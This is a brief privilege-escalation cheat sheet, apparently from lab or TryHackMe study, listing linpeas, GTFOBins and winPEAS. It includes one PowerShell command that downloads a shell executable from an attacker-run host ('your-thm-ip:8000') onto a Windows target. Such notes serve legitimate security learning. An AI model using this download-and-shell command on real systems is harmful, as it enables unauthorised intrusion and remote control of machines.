Privilege Escalation Linux linpeas.sh https://linpeas.sh/ SUID and sudo Exploit GTFOBins Windows winPEAS Github link Download File on cmd powershell "(New-Object System.Net.WebClient).Downloadfile('http://your-thm-ip:8000/shell-name.exe','shell-name.exe')"